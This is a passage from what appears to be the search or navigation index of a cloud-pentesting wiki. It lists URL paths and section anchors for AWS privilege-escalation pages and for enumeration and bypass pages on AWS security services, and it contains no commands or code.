pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#lambdaaddpermission","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#lambdaaddlayerversionpermission","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#lambdaupdatefunctioncode","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#lambdaupdatefunctionconfiguration","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#iampassrole-lambdacreatefunction-lambdacreatefunctionurlconfig-lambdainvokefunctionurl","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#lambda-mitm","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#references","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#aws---lightsail-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsail","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsaildownloaddefaultkeypair","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailgetinstanceaccessdetails","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailcreatebucketaccesskey","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailgetrelationaldatabasemasteruserpassword","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailupdaterelationaldatabase","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailopeninstancepublicports","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailputinstancepublicports","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailsetresourceaccessforbucket","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailupdatebucket","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailupdatecontainerservice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailcreatedomainentry","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailupdatedomainentry","pentesting-cloud/aws-security/aws-privilege-escalation/aws-macie-privesc.html#aws---macie-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-macie-privesc.html#macie","pentesting-cloud/aws-security/aws-privilege-escalation/aws-macie-privesc.html#amazon-macie---bypass-reveal-sample-integrity-check","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.html#aws---mediapackage-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.html#mediapackagerotatechannelcredentials","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.html#mediapackagerotateingestendpointcredentials","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.html#references","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.html#aws---mq-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.html#mq","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.html#mqlistbrokers-mqcreateuser","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.html#mqlistbrokers-mqlistusers-mqupdateuser","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.html#mqlistbrokers-mqupdatebroker","pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.html#aws---msk-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.html#msk","pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.html#msklistclusters-mskupdatesecurity","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#aws---rds-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#rds---relational-database-service","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#rdsmodifydbinstance","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#rds-dbconnect","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#abuse-rds-role-iam-permissions","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#rdsaddroletodbcluster-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#rdscreatedbinstance","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#rdscreatedbinstance-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#rdsaddroletodbinstance-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#aws---redshift-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#redshift","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#redshiftdescribeclusters-redshiftgetclustercredentials","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#redshiftdescribeclusters-redshiftgetclustercredentialswithiam","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#redshiftdescribeclusters-redshiftmodifycluster","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#accessing-external-services","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#lambdas","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#s3","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#dynamo","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#emr","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#references","pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.html#aws---route53-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.html#route53createhostedzone-route53changeresourcerecordsets-acm-pcaissuecertificate-acm-pcagetcertificate","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.html#aws---sns-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.html#sns","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.html#snspublish","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.html#snssubscribe","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.html#snsaddpermission","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.html#aws---sqs-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.html#sqs","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.html#sqsaddpermission","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.html#sqssendmessage--sqssendmessagebatch","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.html#sqsreceivemessage-sqsdeletemessage-sqschangemessagevisibility","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#aws---sso--identitystore-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#aws-identity-center--aws-sso","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#reset-password","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#identitystorecreategroupmembership","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssoputinlinepolicytopermissionset-ssoprovisionpermissionset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssoattachmanagedpolicytopermissionset-ssoprovisionpermissionset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssoattachcustomermanagedpolicyreferencetopermissionset-ssoprovisionpermissionset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssocreateaccountassignment","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssogetrolecredentials","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssodetachmanagedpolicyfrompermissionset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssodetachcustomermanagedpolicyreferencefrompermissionset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssodeleteinlinepolicyfrompermissionset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssodeletepermissionboundaryfrompermissionset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.html#aws---organizations-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.html#organizations","pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.html#from-management-account-to-children-accounts","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#aws---s3-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#s3","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#s3putbucketnotification-s3putobject-s3getobject","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#s3putobject-s3getobject","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#s3putobject-s3getobject-optional-over-terraform-state-file","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#s3putbucketpolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#s3getbucketacl-s3putbucketacl","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#s3getobjectacl-s3putobjectacl","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#s3getobjectacl-s3putobjectversionacl","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.html#aws---sagemaker-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.html#aws---sagemaker-privesc-1","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.html#iampassrole--sagemakercreatenotebookinstance-sagemakercreatepresignednotebookinstanceurl","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.html#sagemakercreatepresignednotebookinstanceurl","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.html#sagemakercreateprocessingjobiampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.html#sagemakercreatetrainingjob-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.html#sagemakercreatehyperparametertuningjob-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.html#references","pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.html#aws---secrets-manager-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.html#secrets-manager","pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.html#secretsmanagergetsecretvalue","pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.html#secretsmanagergetresourcepolicy-secretsmanagerputresourcepolicy-secretsmanagerlistsecrets","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#aws---ssm-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#ssm","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#ssmsendcommand","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#ssmstartsession","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#ssmresumesession","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#ssmdescribeparameters-ssmgetparameter--ssmgetparameters","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#ssmlistcommands","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#ssmgetcommandinvocation-ssmlistcommandinvocations--ssmlistcommands","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#using-ssmcreateassociation","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#codebuild","pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.html#aws---step-functions-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.html#step-functions","pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.html#task-resources","pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.html#statesteststate--iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.html#statescreatestatemachine--iampassrole--statesstartexecution--statesstartsyncexecution","pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.html#statesupdatestatemachine--not-always-required-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.html#aws---sts-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.html#sts","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.html#stsassumerole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.html#stsgetfederationtoken","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.html#stsassumerolewithsaml","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.html#stsassumerolewithwebidentity","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.html#federation-abuse","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.html#iam-roles-anywhere-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.html#references","pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.html#aws---workdocs-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.html#workdocs","pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.html#workdocscreateuser","pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.html#workdocsgetdocument-workdocsdescribeactivities","pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.html#workdocsaddresourcepermissions","pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.html#workdocsaddusertogroup","pentesting-cloud/aws-security/aws-services/index.html#aws---services","pentesting-cloud/aws-security/aws-services/index.html#types-of-services","pentesting-cloud/aws-security/aws-services/index.html#container-services","pentesting-cloud/aws-security/aws-services/index.html#abstract-services","pentesting-cloud/aws-security/aws-services/index.html#services-enumeration","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/index.html#aws---security--detection-services","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#aws---cloudtrail-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#cloudtrail","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#aggregate-logs-from-multiple-accounts","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#cloudtrail-from-all-org-accounts-into-1","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#log-files-checking","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#logs-to-cloudwatch","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#event-history","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#insights","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#security","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#access-advisor","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#actions","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#csv-injection","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#bypass-detection","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#honeytokens--bypass","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#accessing-third-infrastructure","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#modifying-cloudtrail-config","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#modifying-bucket-configuration","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#cloudtrail-ransomware","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#aws---cloudwatch-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatch","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#key-concepts","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#namespaces","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#metrics","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#dimensions","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#statistics","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#units","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatch-features","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#dashboard","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#metric-stream-and-metric-data","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#alarm","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#anomaly-detectors","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#insight-rules-and-managed-insight-rules","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatch-logs","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatch-monitoring--events","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#agent-installation","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#post-exploitation--bypass","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchdeletealarmscloudwatchputmetricalarm--cloudwatchputcompositealarm","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchdeletealarmactions-cloudwatchenablealarmactions--cloudwatchsetalarmstate","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchdeleteanomalydetector-cloudwatchputanomalydetector","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchdeletedashboards-cloudwatchputdashboard","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchdeleteinsightrules-cloudwatchputinsightrule-cloudwatchputmanagedinsightrule","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchdisableinsightrules-cloudwatchenableinsightrules","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchdeletemetricstream--cloudwatchputmetricstream--cloudwatchputmetricdata","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchstopmetricstreams-cloudwatchstartmetricstreams","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchtagresource-cloudwatchuntagresource","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.html#aws---config-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.html#aws-config","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.html#functioning","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.html#config-rules","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.html#aws---control-tower-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.html#control-tower","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.html#post-exploitation--persistence","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.html#aws---cost-explorer-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.html#cost-explorer-and-anomaly-detection","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.html#budgets","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.html#aws---detective-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.html#detective","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#aws---firewall-manager-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#firewall-manager","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#prerequisites","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#types-of-protection-policies","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#administrator-accounts","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#post-exploitation--bypass-detection","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#organizationsdescribeorganization--fmsassociateadminaccount-fmsdisassociateadminaccount-fmsputadminaccount","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#fmsputpolicy-fmsdeletepolicy","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#fmsbatchassociateresource-fmsbatchdisassociateresource-fmsputresourceset-fmsdeleteresourceset","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#fmsputappslist-fmsdeleteappslist","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#fmsputprotocolslist-fmsdeleteprotocolslist","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#fmsputnotificationchannel-fmsdeletenotificationchannel","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#fmsassociatethirdpartyfirewall-fmsdisssociatethirdpartyfirewall","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#fmstagresource-fmsuntagresource","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#aws---guardduty-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#guardduty","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#findings-example","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#all-findings","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#multi-accounts","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#guardduty-bypass","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#general-guidance","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#breaking-guardduty","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#specific-findings-bypass-examples","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.html#aws---inspector-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.html#inspector","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.html#key-elements","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.html#key-features","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.html#aws---security-hub-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.html#security-hub","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.html#bypass-detection","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.html#aws---shield-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.html#shield","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.html#aws---trusted-advisor-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.html#aws-trusted-advisor-overview","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.html#notifications-and-data-refresh","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.html#checks-breakdown","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.html#aws---waf-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.html#aws-waf","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.html#key-concepts","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.html#key-features","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.html#post-exploitation--bypass","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#aws---api-gateway-enum","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#api-gateway","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#basic-information","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#api-gateways-types","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#api-gateway-main-components","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#logging","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#different-authorizations-to-access-api-gateway-endpoints","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#resource-policy","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#iam-authorizer","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#request-signing-using-python","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#custom-lambda-authorizer","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#required-api-key","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#unauthenticated-access","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.html#aws---certificate-manager-acm--private-certificate-authority-pca","pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.html#basic-information","pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.html#acm","pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.html#pcm","pentesting-cloud/aws-security/aws-services/aws-certificate-mana